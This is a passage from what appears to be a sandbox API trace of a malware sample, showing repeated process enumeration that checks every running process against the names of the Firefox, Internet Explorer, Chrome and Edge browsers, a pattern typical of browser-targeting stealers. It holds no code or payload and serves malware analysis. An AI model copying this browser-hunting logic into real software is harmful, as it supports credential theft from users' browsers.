lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0178.159] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0178.159] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0178.159] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0178.159] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.159] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.160] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.160] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.160] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.160] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.160] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0178.161] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0178.161] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0178.161] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0178.161] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.161] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0178.161] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0178.161] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0178.161] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0178.161] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.161] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0178.162] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0178.162] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0178.162] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0178.162] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.162] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0178.162] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0178.162] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0178.162] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0178.162] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.162] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0178.163] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0178.163] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0178.163] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0178.163] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.163] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0178.163] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0178.164] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0178.164] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0178.164] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.164] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0178.164] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0178.164] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0178.164] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0178.164] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.164] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0178.165] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0178.165] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0178.165] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0178.165] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.165] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0178.165] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0178.165] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0178.165] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0178.165] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.165] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0178.166] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0178.166] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0178.166] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0178.166] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.166] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0178.166] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0178.166] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0178.166] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0178.166] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.166] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0178.167] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0178.167] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0178.167] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0178.167] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.167] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0178.168] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0178.168] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0178.168] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0178.168] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.168] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0178.168] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0178.168] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0178.168] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0178.168] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.168] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0178.169] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0178.169] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0178.169] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0178.169] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.169] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0178.169] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0178.169] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0178.169] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0178.169] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.169] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0178.170] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0178.170] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0178.170] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0178.170] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.170] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0178.170] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0178.170] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0178.170] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0178.170] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.171] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0178.171] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0178.171] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0178.171] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0178.171] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.171] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0178.172] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0178.172] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0178.172] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0178.172] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.172] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0178.172] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0178.172] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0178.172] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0178.172] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.172] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0178.173] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0178.173] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0178.173] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0178.173] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.173] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.173] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0178.173] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0178.173] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0178.173] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.173] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.174] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.174] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.174] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.174] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.174] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0178.174] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0178.174] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0178.175] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0178.175] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.175] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.175] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.175] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.175] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.175] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.175] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0178.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0178.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0178.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0178.176] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.176] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.176] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0178.176] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0178.176] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0178.176] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.176] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.177] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.177] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.177] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.177] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.177] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0178.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0178.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0178.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0178.177] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.177] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0178.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0178.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0178.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0178.178] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.178] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.178] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.178] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.178] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.179] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.179] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.179] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.179] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.179] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.179] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.180] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0178.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0178.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0178.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0178.180] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0178.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0178.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0178.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0178.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0178.181] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0178.181] CloseHandle (hObject=0xd4) returned 1 [0178.181] Sleep (dwMilliseconds=0x3e8) [0179.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0179.192] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.193] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0179.193] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0179.193] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0179.193] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0179.193] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.193] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0179.193] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0179.193] lstrcmpiA (lpString1="System", 